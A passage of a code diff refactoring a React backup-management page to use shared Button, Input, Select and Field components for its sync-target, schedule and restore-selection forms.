                         : `Show all ${sortedNasBackups.length} snapshots`}
-                    </button>
+                    </Button>
                   )}
                 </div>
                 );
@@ -1089,7 +1086,7 @@ export default function BackupPage() {
             <label className="flex items-center gap-2 cursor-pointer">
               <span className="text-xs text-text-muted">{backupSync.enabled ? 'Enabled' : 'Disabled'}</span>
               <div className="relative">
-                <input type="checkbox" className="sr-only peer" checked={backupSync.enabled} onChange={e => setBackupSync(prev => ({ ...prev, enabled: e.target.checked }))} />
+                <Input type="checkbox" className="sr-only peer" checked={backupSync.enabled} onChange={e => setBackupSync(prev => ({ ...prev, enabled: e.target.checked }))} />
                 <div className="w-9 h-5 bg-surface-muted peer-focus:outline-none rounded-full peer border border-border peer-checked:after:translate-x-full after:content-[''] after:absolute after:top-[2px] after:start-[2px] after:bg-surface after:rounded-full after:h-4 after:w-4 after:transition-all peer-checked:bg-accent"></div>
               </div>
             </label>
@@ -1112,9 +1109,9 @@ export default function BackupPage() {
           <div>
             <div className="flex items-center justify-between mb-2">
               <label className="block text-xs font-medium text-text-muted">Source Directories</label>
-              <button type="button" onClick={addBackupSource} className="inline-flex items-center gap-1 text-xs font-medium text-accent hover:text-accent-strong">
+              <Button onClick={addBackupSource} className="inline-flex items-center gap-1 text-xs font-medium text-accent hover:text-accent-strong">
                 <Plus size={14} /> Add source
-              </button>
+              </Button>
             </div>
             <div className="space-y-3">
               {backupSync.sources.length === 0 && (
@@ -1123,7 +1120,7 @@ export default function BackupPage() {
               {backupSync.sources.map((src, i) => (
                 <div key={i} className="rounded-card border border-border bg-surface-muted p-3 space-y-2">
                   <div className="flex items-center gap-2">
-                    <input
+                    <Input
                       type="text"
                       className="flex-1 px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text"
                       value={src.path}
@@ -1141,14 +1138,18 @@ export default function BackupPage() {
                     </Button>
                   </div>
                   <div>
-                    <label className="block text-[11px] font-medium text-text-muted mb-1">Exclude patterns (one per line)</label>
-                    <textarea
-                      className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text font-mono"
-                      rows={2}
-                      value={src.excludePatterns}
-                      onChange={e => updateBackupSource(i, { excludePatterns: e.target.value })}
-                      placeholder="*.tmp&#10;cache/"
-                    />
+                    <Field label="Exclude patterns (one per line)">
+                      {(props) => (
+                        <Textarea
+                          {...props}
+                          className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text font-mono"
+                          rows={2}
+                          value={src.excludePatterns}
+                          onChange={e => updateBackupSource(i, { excludePatterns: e.target.value })}
+                          placeholder="*.tmp&#10;cache/"
+                        />
+                      )}
+                    </Field>
                   </div>
                 </div>
               ))}
@@ -1172,9 +1173,8 @@ export default function BackupPage() {
               ] as const).map(({ val, label, hint, Icon }) => {
                 const active = backupSync.targetType === val;
                 return (
-                  <button
+                  <Button
                     key={val}
-                    type="button"
                     onClick={() => setBackupSync(prev => ({ ...prev, targetType: val }))}
                     aria-pressed={active}
                     className={`flex items-start gap-2 px-3 py-2 text-left rounded-card border-2 transition-colors ${active ? 'bg-accent/10 border-accent' : 'border-border hover:bg-surface-2 hover:border-border-strong'}`}
@@ -1184,7 +1184,7 @@ export default function BackupPage() {
                       <div className={`text-xs font-semibold ${active ? 'text-accent' : 'text-text'}`}>{label}</div>
                       <div className={`text-[11px] leading-tight ${active ? 'text-accent/70' : 'text-text-muted'}`}>{hint}</div>
                     </div>
-                  </button>
+                  </Button>
                 );
               })}
             </div>
@@ -1211,77 +1211,124 @@ export default function BackupPage() {
 
           {backupSync.targetType === 'ssh' && (
             <div className="grid grid-cols-2 gap-3">
-              <div>
-                <label className="block text-xs font-medium text-text-muted mb-1">Host</label>
-                <input type="text" className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.sshHost} onChange={e => setBackupSync(prev => ({ ...prev, sshHost: e.target.value }))} placeholder="192.168.1.100" />
-              </div>
-              <div>
-                <label className="block text-xs font-medium text-text-muted mb-1">Port</label>
-                <input type="text" className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.sshPort} onChange={e => setBackupSync(prev => ({ ...prev, sshPort: e.target.value }))} placeholder="22" />
-              </div>
-              <div>
-                <label className="block text-xs font-medium text-text-muted mb-1">User</label>
-                <input type="text" className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.sshUser} onChange={e => setBackupSync(prev => ({ ...prev, sshUser: e.target.value }))} />
-              </div>
-              <div>
-                <label className="block text-xs font-medium text-text-muted mb-1">Remote Path</label>
-                <input type="text" className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.sshPath} onChange={e => setBackupSync(prev => ({ ...prev, sshPath: e.target.value }))} placeholder="/backup" />
-              </div>
+              <Field label="Host">
+                {(props) => (
+                  <Input type="text" {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.sshHost} onChange={e => setBackupSync(prev => ({ ...prev, sshHost: e.target.value }))} placeholder="192.168.1.100" />
+                )}
+              </Field>
+              <Field label="Port">
+                {(props) => (
+                  <Input type="text" {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.sshPort} onChange={e => setBackupSync(prev => ({ ...prev, sshPort: e.target.value }))} placeholder="22" />
+                )}
+              </Field>
+              <Field label="User">
+                {(props) => (
+                  <Input type="text" {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.sshUser} onChange={e => setBackupSync(prev => ({ ...prev, sshUser: e.target.value }))} />
+                )}
+              </Field>
+              <Field label="Remote Path">
+                {(props) => (
+                  <Input type="text" {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.sshPath} onChange={e => setBackupSync(prev => ({ ...prev, sshPath: e.target.value }))} placeholder="/backup" />
+                )}
+              </Field>
               <div className="col-span-2">
-                <label className="block text-xs font-medium text-text-muted mb-1">Identity File</label>
-                <input type="text" className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.sshIdentityFile} onChange={e => setBackupSync(prev => ({ ...prev, sshIdentityFile: e.target.value }))} />
+                <Field label="Identity File">
+                  {(props) => (
+                    <Input type="text" {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.sshIdentityFile} onChange={e => setBackupSync(prev => ({ ...prev, sshIdentityFile: e.target.value }))} />
+                  )}
+                </Field>
               </div>
             </div>
           )}
 
           {backupSync.targetType === 'smb' && (
             <div className="grid grid-cols-2 gap-3">
-              <div><label className="block text-xs font-medium text-text-muted mb-1">Host</label><input type="text" className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.smbHost} onChange={e => setBackupSync(prev => ({ ...prev, smbHost: e.target.value }))} placeholder="nas.local" /></div>
-              <div><label className="block text-xs font-medium text-text-muted mb-1">Share Name</label><input type="text" className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.smbShare} onChange={e => setBackupSync(prev => ({ ...prev, smbShare: e.target.value }))} placeholder="backup" /></div>
-              <div><label className="block text-xs font-medium text-text-muted mb-1">Subfolder (optional)</label><input type="text" className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.smbPath} onChange={e => setBackupSync(prev => ({ ...prev, smbPath: e.target.value }))} /></div>
-              <div><label className="block text-xs font-medium text-text-muted mb-1">Username</label><input type="text" className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.smbUsername} onChange={e => setBackupSync(prev => ({ ...prev, smbUsername: e.target.value }))} /></div>
-              <div className="col-span-2"><label className="block text-xs font-medium text-text-muted mb-1">Password</label><input type="password" className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.smbPassword} onChange={e => setBackupSync(prev => ({ ...prev, smbPassword: e.target.value }))} /></div>
+              <Field label="Host">
+                {(props) => (
+                  <Input type="text" {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.smbHost} onChange={e => setBackupSync(prev => ({ ...prev, smbHost: e.target.value }))} placeholder="nas.local" />
+                )}
+              </Field>
+              <Field label="Share Name">
+                {(props) => (
+                  <Input type="text" {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.smbShare} onChange={e => setBackupSync(prev => ({ ...prev, smbShare: e.target.value }))} placeholder="backup" />
+                )}
+              </Field>
+              <Field label="Subfolder (optional)">
+                {(props) => (
+                  <Input type="text" {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.smbPath} onChange={e => setBackupSync(prev => ({ ...prev, smbPath: e.target.value }))} />
+                )}
+              </Field>
+              <Field label="Username">
+                {(props) => (
+                  <Input type="text" {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.smbUsername} onChange={e => setBackupSync(prev => ({ ...prev, smbUsername: e.target.value }))} />
+                )}
+              </Field>
+              <div className="col-span-2">
+                <Field label="Password">
+                  {(props) => (
+                    <Input type="password" {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.smbPassword} onChange={e => setBackupSync(prev => ({ ...prev, smbPassword: e.target.value }))} />
+                  )}
+                </Field>
+              </div>
             </div>
           )}
 
           {backupSync.targetType === 'nfs' && (
             <div className="grid grid-cols-2 gap-3">
-              <div><label className="block text-xs font-medium text-text-muted mb-1">Host</label><input type="text" className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.nfsHost} onChange={e => setBackupSync(prev => ({ ...prev, nfsHost: e.target.value }))} placeholder="nas.local" /></div>
-              <div><label className="block text-xs font-medium text-text-muted mb-1">Export Path</label><input type="text" className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.nfsExport} onChange={e => setBackupSync(prev => ({ ...prev, nfsExport: e.target.value }))} placeholder="/volume1/backup" /></div>
-              <div className="col-span-2"><label className="block text-xs font-medium text-text-muted mb-1">Subfolder (optional)</label><input type="text" className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.nfsPath} onChange={e => setBackupSync(prev => ({ ...prev, nfsPath: e.target.value }))} /></div>
+              <Field label="Host">
+                {(props) => (
+                  <Input type="text" {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.nfsHost} onChange={e => setBackupSync(prev => ({ ...prev, nfsHost: e.target.value }))} placeholder="nas.local" />
+                )}
+              </Field>
+              <Field label="Export Path">
+                {(props) => (
+                  <Input type="text" {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.nfsExport} onChange={e => setBackupSync(prev => ({ ...prev, nfsExport: e.target.value }))} placeholder="/volume1/backup" />
+                )}
+              </Field>
+              <div className="col-span-2">
+                <Field label="Subfolder (optional)">
+                  {(props) => (
+                    <Input type="text" {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.nfsPath} onChange={e => setBackupSync(prev => ({ ...prev, nfsPath: e.target.value }))} />
+                  )}
+                </Field>
+              </div>
             </div>
           )}
           </div>
 
           <div className="grid grid-cols-2 gap-3">
-            <div>
-              <label className="block text-xs font-medium text-text-muted mb-1">Schedule</label>
-              <select className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.schedule} onChange={e => setBackupSync(prev => ({ ...prev, schedule: e.target.value as 'hourly' | 'daily' | 'weekly' | 'monthly' }))}>
-                <option value="hourly">Hourly</option>
-                <option value="daily">Daily</option>
-                <option value="weekly">Weekly</option>
-                <option value="monthly">Monthly</option>
-              </select>
-            </div>
-            <div>
-              <label className="block text-xs font-medium text-text-muted mb-1">Time (UTC)</label>
-              <input type="time" className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.time} onChange={e => setBackupSync(prev => ({ ...prev, time: e.target.value }))} />
-            </div>
+            <Field label="Schedule">
+              {(props) => (
+                <Select {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.schedule} onChange={e => setBackupSync(prev => ({ ...prev, schedule: e.target.value as 'hourly' | 'daily' | 'weekly' | 'monthly' }))}>
+                  <option value="hourly">Hourly</option>
+                  <option value="daily">Daily</option>
+                  <option value="weekly">Weekly</option>
+                  <option value="monthly">Monthly</option>
+                </Select>
+              )}
+            </Field>
+            <Field label="Time (UTC)">
+              {(props) => (
+                <Input type="time" {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.time} onChange={e => setBackupSync(prev => ({ ...prev, time: e.target.value }))} />
+              )}
+            </Field>
             {backupSync.schedule === 'weekly' && (
-              <div>
-                <label className="block text-xs font-medium text-text-muted mb-1">Day of Week</label>
-                <select className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.dayOfWeek ?? 0} onChange={e => setBackupSync(prev => ({ ...prev, dayOfWeek: parseInt(e.target.value) }))}>
-                  {['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday'].map((d, i) => (
-                    <option key={i} value={i}>{d}</option>
-                  ))}
-                </select>
-              </div>
+              <Field label="Day of Week">
+                {(props) => (
+                  <Select {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.dayOfWeek ?? 0} onChange={e => setBackupSync(prev => ({ ...prev, dayOfWeek: parseInt(e.target.value) }))}>
+                    {['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday'].map((d, i) => (
+                      <option key={i} value={i}>{d}</option>
+                    ))}
+                  </Select>
+                )}
+              </Field>
             )}
             {backupSync.schedule === 'monthly' && (
-              <div>
-                <label className="block text-xs font-medium text-text-muted mb-1">Day of Month</label>
-                <input type="number" min={1} max={28} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.dayOfMonth ?? 1} onChange={e => setBackupSync(prev => ({ ...prev, dayOfMonth: parseInt(e.target.value) || 1 }))} />
-              </div>
+              <Field label="Day of Month">
+                {(props) => (
+                  <Input type="number" min={1} max={28} {...props} className="w-full px-3 py-2 text-sm rounded-card border border-border bg-surface-2 text-text" value={backupSync.dayOfMonth ?? 1} onChange={e => setBackupSync(prev => ({ ...prev, dayOfMonth: parseInt(e.target.value) || 1 }))} />
+                )}
+              </Field>
             )}
           </div>
 
@@ -1376,9 +1423,9 @@ export default function BackupPage() {
                 <h3 className="text-lg font-semibold text-text">Restore from Backup</h3>
                 <p className="text-xs text-text-muted">Select what to restore before applying changes.</p>
               </div>
-              <button type="button" onClick={closeRestoreOverlay} className="rounded-full p-2 text-text-muted hover:text-text hover:bg-surface-2" aria-label="Close restore panel">
+              <Button onClick={closeRestoreOverlay} className="rounded-full p-2 text-text-muted hover:text-text hover:bg-surface-2" aria-label="Close restore panel">
                 <X size={18} />
-              </button>
+              </Button>
             </div>
 
             <div className="flex-1 overflow-y-auto px-6 py-5 space-y-6">
@@ -1391,7 +1438,7 @@ export default function BackupPage() {
                     <label htmlFor="restore-backup-file" className="inline-flex items-center gap-2 px-4 py-2 bg-surface-2 border border-border rounded-card text-sm text-text hover:bg-surface-muted cursor-pointer">
                       <UploadCloud size={16} /> Select file
                     </label>
-                    <input id="restore-backup-file" type="file" accept=".tar.gz" className="hidden" onChange={(event) => handleRestoreFromFile(event.target.files?.[0] || null)} />
+                    <Input id="restore-backup-file" type="file" accept=".tar.gz" className="hidden" onChange={(event) => handleRestoreFromFile(event.target.files?.[0] || null)} />
                   </div>
                   {restoreUploadError && (<p className="mt-3 text-xs text-status-fail">{restoreUploadError}</p>)}
                 </div>
@@ -1415,7 +1462,7 @@ export default function BackupPage() {
 
                   {/* Settings */}
                   <div className="rounded-card border border-border overflow-hidden">
-                    <button type="button" onClick={() => toggleRestoreSection('settings')} className="w-full flex items-center gap-3 px-4 py-3 text-left hover:bg-surface-2 transition-colors">
+                    <Button onClick={() => toggleRestoreSection('settings')} className="w-full flex items-center gap-3 px-4 py-3 text-left hover:bg-surface-2 transition-colors">
                       {restoreExpandedSections.settings ? <ChevronDown size={16} className="text-text-subtle shrink-0" /> : <ChevronRight size={16} className="text-text-subtle shrink-0" />}
                       <Settings size={16} className="text-text-subtle shrink-0" />
                       <div className="flex-1 min-w-0">
@@ -1424,7 +1471,7 @@ export default function BackupPage() {
                           {Object.values(restoreSelectionState.configFlags).filter(Boolean).length} of {Object.keys(restoreSelectionState.configFlags).length} selected
                         </span>
                       </div>
-                    </button>
+                    </Button>
                     {restoreExpandedSections.settings && (
                       <div className="px-4 pb-4 pt-1 border-t border-border grid gap-2.5">
                         {([
@@ -1437,7 +1484,11 @@ export default function BackupPage() {
                           { key: 'update' as const, label: 'Auto-update', summary: restorePreview.config.update ? (restorePreview.config.update.enabled === false ? 'Disabled' : 'Enabled') : 'Not configured' },
                         ]).map(item => (
                           <label key={item.key} className="flex items-center gap-3 text-sm text-text py-1">
-                            <input type="checkbox" className="rounded" checked={restoreSelectionState.configFlags[item.key]} onChange={() => toggleRestoreConfigFlag(item.key)} />
+                            <Field label="">
+                              {(props) => (
+                                <Input type="checkbox" {...props} className="rounded" checked={restoreSelectionState.configFlags[item.key]} onChange={() => toggleRestoreConfigFlag(item.key)} />
+                              )}
+                            </Field>
                             <span className="font-medium min-w-[120px]">{item.label}</span>
                             <span className="text-xs text-text-muted truncate">{item.summary}</span>
                           </label>
@@ -1448,7 +1499,7 @@ export default function BackupPage() {
 
                   {/* Nodes & Checks */}
                   <div className="rounded-card border border-border overflow-hidden">
-                    <button type="button" onClick={() => toggleRestoreSection('infrastructure')} className="w-full flex items-center gap-3 px-4 py-3 text-left hover:bg-surface-2 transition-colors">
+                    <Button onClick={() => toggleRestoreSection('infrastructure')} className="w-full flex items-center gap-3 px-4 py-3 text-left hover:bg-surface-2 transition-colors">
                       {restoreExpandedSections.infrastructure ? <ChevronDown size={16} className="text-text-subtle shrink-0" /> : <ChevronRight size={16} className="text-text-subtle shrink-0" />}
                       <Activity size={16} className="text-text-subtle shrink-0" />
                       <div className="flex-1 min-w-0">
@@ -1458,7 +1509,7 @@ export default function BackupPage() {
                           {' '}{Object.values(restoreSelectionState.checks).filter(Boolean).length} check{Object.values(restoreSelectionState.checks).filter(Boolean).length !== 1 ? 's' : ''}
                         </span>
                       </div>
-                    </button>
+                    </Button>
                     {restoreExpandedSections.infrastructure && (
                       <div className="px-4 pb-4 pt-1 border-t border-border space-y-4">
                         {restorePreview.config.nodes.length > 0 && (
@@ -1466,12 +1517,16 @@ export default function BackupPage() {
                             <p className="text-xs font-medium text-text-muted uppercase tracking-wide mb-2">Nodes</p>
                             <div className="grid gap-2">
                               {restorePreview.config.nodes.map(node => (
-                                <label key={node.name} className="flex items-center gap-3 text-sm text-text">
-                                  <input type="checkbox" className="rounded" checked={restoreSelectionState.nodes[node.name]} onChange={() => toggleRestoreNode(node.name)} />
+                                <div key={node.name} className="flex items-center gap-3 text-sm text-text">
+                                  <Field label="">
+                                    {(props) => (
+                                      <Input type="checkbox" {...props} className="rounded" checked={restoreSelectionState.nodes[node.name]} onChange={() => toggleRestoreNode(node.name)} />
+                                    )}
+                                  </Field>
                                   <Server size={14} className="text-text-subtle shrink-0" />
                                   <span className="font-medium">{node.name}</span>
                                   <span className="text-xs text-text-muted">{node.uri}{node.default ? ' · Default' : ''}</span>
-                                </label>
+                                </div>
                               ))}
                             </div>
                           </div>
@@ -1481,12 +1536,16 @@ export default function BackupPage() {
                             <p className="text-xs font-medium text-text-muted uppercase tracking-wide mb-2">Health Checks</p>
                             <div className="grid gap-2">
                               {restorePreview.config.checks.map(check => (
-                                <label key={check.id} className="flex items-center gap-3 text-sm text-text">
-                                  <input type="checkbox" className="rounded" checked={restoreSelectionState.checks[check.id]} onChange={() => toggleRestoreCheck(check.id)} />
+                                <div key={check.id} className="flex items-center gap-3 text-sm text-text">
+                                  <Field label="">
+                                    {(props) => (
+                                      <Input type="checkbox" {...props} className="rounded" checked={restoreSelectionState.checks[check.id]} onChange={() => toggleRestoreCheck(check.id)} />
+                                    )}
+                                  </Field>
                                   <span className="font-medium">{check.name}</span>
                                   {check.type && <span className="text-[10px] uppercase px-1.5 py-0.5 rounded bg-surface-2 text-text-muted">{check.type}</span>}
                                   {check.target && <span className="text-xs text-text-muted">{check.target}</span>}
-                                </label>
+                                </div>
                               ))}
                             </div>
                           </div>
@@ -1501,7 +1560,7 @@ export default function BackupPage() {
                   {/* Systemd Files */}
                   {restorePreview.nodeFiles.length > 0 && (
                     <div className="rounded-card border border-border overflow-hidden">
-                      <button type="button" onClick={() => toggleRestoreSection('files')} className="w-full flex items-center gap-3 px-4 py-3 text-left hover:bg-surface-2 transition-colors">
+                      <Button onClick={() => toggleRestoreSection('files')} className="w-full flex items-center gap-3 px-4 py-3 text-left hover:bg-surface-2 transition-colors">
                         {restoreExpandedSections.files ? <ChevronDown size={16} className="text-text-subtle shrink-0" /> : <ChevronRight size={16} className="text-text-subtle shrink-0" />}
                         <FolderOpen size={16} className="text-text-subtle shrink-0" />
                         <div className="flex-1 min-w-0">
@@ -1510,7 +1569,7 @@ export default function BackupPage() {
                             {Object.values(restoreSelectionState.nodeFiles).reduce((sum, files) => sum + Object.values(files).filter(Boolean).length, 0)} of {restorePreview.nodeFiles.reduce((sum, g) => sum + g.files.length, 0)} files selected
                           </span>
                         </div>
-                      </button>
+                      </Button>
                       {restoreExpandedSections.files && (
                         <div className="border-t border-border">
                           {restorePreview.nodeFiles.map(group => {
@@ -1521,15 +1580,23 @@ export default function BackupPage() {
                               <div key={group.nodeName} className="border-b border-border last:border-b-0">
                                 <div className="flex items-center justify-between gap-2 px-4 py-2.5 bg-surface-muted">
                                   <div className="flex items-center gap-3">
-                                    <input type="checkbox" className="rounded" checked={allSelected} onChange={() => toggleAllNodeFiles(group.nodeName, !allSelected)} />
+                                    <Field label="">
+                                      {(props) => (
+                                        <Input type="checkbox" {...props} className="rounded" checked={allSelected} onChange={() => toggleAllNodeFiles(group.nodeName, !allSelected)} />
+                                      )}
+                                    </Field>
                                     <span className="text-sm font-medium text-text">{group.nodeName}</span>
                                     <span className="text-xs text-text-muted">{selectedCount}/{group.files.length} files</span>
                                   </div>
                                   <div className="flex items-center gap-2 text-xs text-text-muted">
                                     <span>Target:</span>
-                                    <select value={restoreSelectionState.targetNodes[group.nodeName]} onChange={(event) => updateRestoreTargetNode(group.nodeName, event.target.value)} className="bg-surface-2 border border-border text-text rounded px-2 py-1 text-xs">
-                                      {availableRestoreTargets.map(target => (<option key={target} value={target}>{target}</option>))}
-                                    </select>
+                                    <Field label="">
+                                      {(props) => (
+                                        <Select {...props} value={restoreSelectionState.targetNodes[group.nodeName]} onChange={(event) => updateRestoreTargetNode(group.nodeName, event.target.value)} className="bg-surface-2 border border-border text-text rounded px-2 py-1 text-xs">
+                                          {availableRestoreTargets.map(target => (<option key={target} value={target}>{target}</option>))}
+                                        </Select>
+                                      )}
+                                    </Field>
                                   </div>
                                 </div>
                                 <div className="max-h-80 overflow-y-auto">
@@ -1542,22 +1609,30 @@ export default function BackupPage() {
                                     return (
                                       <div key={sg.service} className="border-b border-border last:border-b-0">
                                         <div className="flex items-center gap-2 px-4 py-2 hover:bg-surface-2">
-                                          <input type="checkbox" className="rounded" checked={sgAllSelected} onChange={() => toggleServiceGroupFiles(group.nodeName, sg.files, !sgAllSelected)} />
-                                          <button type="button" onClick={() => toggleRestoreSection(sgKey)} className="flex items-center gap-1.5 flex-1 min-w-0 text-left">
+                                          <Field label="">
+                                            {(props) => (
+                                              <Input type="checkbox" {...props} className="rounded" checked={sgAllSelected} onChange={() => toggleServiceGroupFiles(group.nodeName, sg.files, !sgAllSelected)} />
+                                            )}
+                                          </Field>
+                                          <Button onClick={() => toggleRestoreSection(sgKey)} className="flex items-center gap-1.5 flex-1 min-w-0 text-left">
                                             {sgExpanded ? <ChevronDown size={12} className="text-text-subtle shrink-0" /> : <ChevronRight size={12} className="text-text-subtle shrink-0" />}
                                             <span className="text-xs font-medium text-text capitalize">{displayName}</span>
                                             <span className="text-[10px] text-text-subtle">{sgSelectedCount}/{sg.files.length}</span>
-                                          </button>
+                                          </Button>
                                         </div>
                                         {sgExpanded && (
                                           <div className="pl-10 pr-4 pb-1">
                                             {sg.files.map(file => (
                                               <div key={file.relativePath} className="flex items-center gap-3 py-1 text-xs text-text-muted">
-                                                <input type="checkbox" className="rounded" checked={Boolean(restoreSelectionState.nodeFiles[group.nodeName]?.[file.relativePath])} onChange={() => toggleRestoreFile(group.nodeName, file.relativePath)} />
+                                                <Field label="">
+                                                  {(props) => (
+                                                    <Input type="checkbox" {...props} className="rounded" checked={Boolean(restoreSelectionState.nodeFiles[group.nodeName]?.[file.relativePath])} onChange={() => toggleRestoreFile(group.nodeName, file.relativePath)} />
+                                                  )}
+                                                </Field>
                                                 <span className="flex-1 font-mono truncate">{file.fileName}</span>
-                                                <button type="button" onClick={() => handleRestoreFilePreview(group.nodeName, file.relativePath)} className="shrink-0 p-1 rounded text-text-subtle hover:text-text hover:bg-surface-2" title="Preview file">
+                                                <Button onClick={() => handleRestoreFilePreview(group.nodeName, file.relativePath)} className="shrink-0 p-1 rounded text-text-subtle hover:text-text hover:bg-surface-2" title="Preview file">
                                                   <Eye size={14} />
-                                                </button>
+                                                </Button>
                                               </div>
                                             ))}
                                           </div>
@@ -1577,7 +1652,7 @@ export default function BackupPage() {
                   {/* Service Data */}
                   {restorePreview.serviceData && restorePreview.serviceData.length > 0 && (
                     <div className="rounded-card border border-border overflow-hidden">
-                      <button type="button" onClick={() => toggleRestoreSection('serviceData')} className="w-full flex items-center gap-3 px-4 py-3 text-left hover:bg-surface-2 transition-colors">
+                      <Button onClick={() => toggleRestoreSection('serviceData')} className="w-full flex items-center gap-3 px-4 py-3 text-left hover:bg-surface-2 transition-colors">
                         {restoreExpandedSections.serviceData ? <ChevronDown size={16} className="text-text-subtle shrink-0" /> : <ChevronRight size={16} className="text-text-subtle shrink-0" />}
                         <Database size={16} className="text-text-subtle shrink-0" />
                         <div className="flex-1 min-w-0">
@@ -1586,7 +1661,7 @@ export default function BackupPage() {
                             {Object.values(restoreSelectionState.serviceData).reduce((sum, fm) => sum + Object.values(fm).filter(Boolean).length, 0)} file{Object.values(restoreSelectionState.serviceData).reduce((sum, fm) => sum + Object.values(fm).filter(Boolean).length, 0) !== 1 ? 's' : ''} selected
                           </span>
                         </div>
-                      </button>
+                      </Button>
                       {restoreExpandedSections.serviceData && (
                         <div className="px-4 pb-4 pt-1 border-t border-border space-y-3">
                           <p className="text-xs text-status-warn bg-status-warn/10 border border-status-warn/30 rounded-card px-3 py-2">
@@ -1605,12 +1680,16 @@ export default function BackupPage() {
                             return (
                               <div key={sd.name} className="rounded border border-border">
                                 <div className="flex items-center gap-2 px-3 py-2">
-                                  <input type="checkbox" className="rounded" checked={allSelected} onChange={() => setRestoreSelectionState(prev => {
-                                    if (!prev) return prev;
-                                    const newVal = !allSelected;
-                                    return { ...prev, serviceData: { ...prev.serviceData, [sd.name]: Object.fromEntries(sd.files.map(f => [f, newVal])) } };
-                                  })} />
-                                  <button type="button" onClick={() => toggleRestoreSection(sdKey)} className="flex items-center gap-2 flex-1 min-w-0">
+                                  <Field label="">
+                                    {(props) => (
+                                      <Input type="checkbox" {...props} className="rounded" checked={allSelected} onChange={() => setRestoreSelectionState(prev => {
+                                        if (!prev) return prev;
+                                        const newVal = !allSelected;
+                                        return { ...prev, serviceData: { ...prev.serviceData, [sd.name]: Object.fromEntries(sd.files.map(f => [f, newVal])) } };
+                                      })} />
+                                    )}
+                                  </Field>
+                                  <Button onClick={() => toggleRestoreSection(sdKey)} className="flex items-center gap-2 flex-1 min-w-0">
                                     {sdExpanded ? <ChevronDown size={14} className="text-text-subtle shrink-0" /> : <ChevronRight size={14} className="text-text-subtle shrink-0" />}
                                     <HardDrive size={14} className="text-text-subtle shrink-0" />
                                     <div className="flex flex-col items-start min-w-0">
@@ -1624,10 +1703,10 @@ export default function BackupPage() {
                                         </span>
                                       )}
                                     </div>
-                                  </button>
+                                  </Button>
                                   <div className="flex items-center gap-1 shrink-0">
                                     {fileCategories.map(cat => (
-                                      <button key={cat.category} type="button" title={`Select only ${SERVICE_DATA_CATEGORY_LABELS[cat.category].toLowerCase()} (${cat.files.length} files)`} onClick={() => setRestoreSelectionState(prev => {
+                                      <Button key={cat.category} title={`Select only ${SERVICE_DATA_CATEGORY_LABELS[cat.category].toLowerCase()} (${cat.files.length} files)`} onClick={() => setRestoreSelectionState(prev => {
                                         if (!prev) return prev;
                                         const newFiles: Record<string, boolean> = {};
                                         for (const f of sd.files) newFiles[f] = false;
@@ -1635,7 +1714,7 @@ export default function BackupPage() {
                                         return { ...prev, serviceData: { ...prev.serviceData, [sd.name]: newFiles } };
                                       })} className="px-1.5 py-0.5 text-xs rounded border border-border hover:bg-surface-2 transition-colors">
                                         {SERVICE_DATA_CATEGORY_ICONS[cat.category]}
-                                      </button>
+                                      </Button>
                                     ))}
                                   </div>
                                 </div>
@@ -1650,32 +1729,40 @@ export default function BackupPage() {
                                       return (
                                         <div key={cat.category}>
                                           <div className="flex items-center gap-2">
-                                            <input type="checkbox" className="rounded" checked={catAllSelected} onChange={() => setRestoreSelectionState(prev => {
-                                              if (!prev) return prev;
-                                              const updated = { ...prev.serviceData[sd.name] };
-                                              const newVal = !catAllSelected;
-                                              for (const f of cat.files) updated[f] = newVal;
